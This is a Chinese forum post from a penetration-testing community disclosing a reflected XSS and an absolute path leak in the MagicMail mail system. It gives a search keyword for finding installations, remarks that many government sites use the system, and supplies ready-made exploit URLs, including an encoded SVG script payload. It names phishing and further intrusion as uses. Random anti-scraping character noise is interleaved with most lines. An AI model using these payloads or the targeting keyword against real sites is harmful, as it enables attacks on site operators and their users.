中国网络渗透测试联盟

标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞 [打印本页]
作者: admin    时间: 2012-11-9 20:38
标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
  o/ O% X8 U: I) C( Q' s# J! Y4 W6 P% [$ v% i: w0 W9 L/ l8 ~

$ h4 m* ~$ q  n: `- t- A  X; e包含  一个反射性XSS  以及  绝对路径泄漏0 p1 e5 W, @& d2 f3 S: s# G
看了看 貌似全部是linux的。
% V$ D( l) D- k1 k3 Q; W
, b- }8 {( w: z, H关键字:迈捷邮件系统 by MagicMail
6 K/ M9 ~1 L6 B0 t4 u# }/ r0 P- R/ l
) p2 v! B) v+ e* V& Q, t; _可以看到很多政府网站都用这个邮件系统
9 \; z% f. x6 |
9 K' [& b% p  q$ g绝对路径 http://madman.in/index.php?login_type=declare&language=* f$ [; M/ L" O5 t

6 f' h2 }: S. v7 _2 p$ a( i2 K: _; n' w: l& N

" B$ ~; t6 O) C5 \; cXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
2 v0 L; Z& w- d1 ~! a; n& |) X  N, ]; Z6 M
) N) E! I  G, d" S
9 N- u$ h) v, ~  Q
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
$ `$ `( S, e# r" J + s! S2 O& T! z+ h$ g
修复方案:看官方补丁吧。
; \2 g% x0 h. Z8 s+ v1 Y' P



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2